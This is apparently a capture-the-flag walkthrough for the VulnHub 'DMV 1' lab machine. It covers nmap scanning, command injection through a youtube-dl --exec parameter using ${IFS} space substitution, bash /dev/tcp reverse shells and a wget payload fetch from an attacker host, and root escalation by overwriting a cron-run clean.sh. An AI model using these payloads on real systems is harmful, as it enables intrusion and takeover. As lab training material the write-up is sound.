VulnHub: DMV 1

Reconnaissance

1. Scan network

nmap -sn <ip range>

2. Scan for open ports

nmap -Pn <ip>

3. Scan for open ports with high port number

nmap -Pn -p- <ip>

4. Scan for service

nmap -sV <ip>

5. Scan for vulnerability

nmap --script vuln <ip>

6. Fuzzing directory

dirb http://<ip>

7. Try login to ssh

ssh <ip>

8. Access site

http://<ip>

http://<ip>/admin

http://<ip>/tmp/

Exploitation

1. Seems like it’s youtube downloader

2. Let’s try some video

Paste Video ID

Error!!!

3. Let’s try again with other video

Still error!!!

4. Intercept with Burp Suite

Send to Repeater

Send the request, there’s an error in result

5. Let’s google the result
I came across to this link: https://github.com/ytdl-org/youtube-dl/issues/21057

Access project page, read the manual

6. Back to repeater, try some command

--exec`pwd`

Read passwd file

--exec`cat /etc/passwd`

Error!!!

Replace space with “${IFS}”

--exec`cat${IFS}/etc/passwd`

7. Reverse shell
Create listener

nc -lvp 1234

Try reverse shell command

Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

--exec`bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.0.2.8/1234${IFS}0>&1`

Failed!!!

Let’s try another way, I will upload reverse shell file to victim’s machine instead

Create python reverse shell and save it as “shell.sh”

Create HTTP Server

python -m SimpleHTTPServer <port no.>

Back to repeater

--exec`cd${IFS}/var/www/html/images/;wget{IFS}http://<attacker ip>:<attacker port>/shell.sh`

--exec`cd${IFS}/var/www/html/images/;bash${IFS}shell.sh`

Privilege Escalation

1. First flag

cd admin
cat flag.txt

2. Get root access

cd /tmp
ls
cat clean.sh
echo 'bash -i >& /dev/tcp/10.0.2.8/1234 0>&1' > clean.sh

Back to attacker’s machine, we already have listener on port 1234.

Wait for a moment

Now, I have root shell

cd /root
ls 
cat root.txt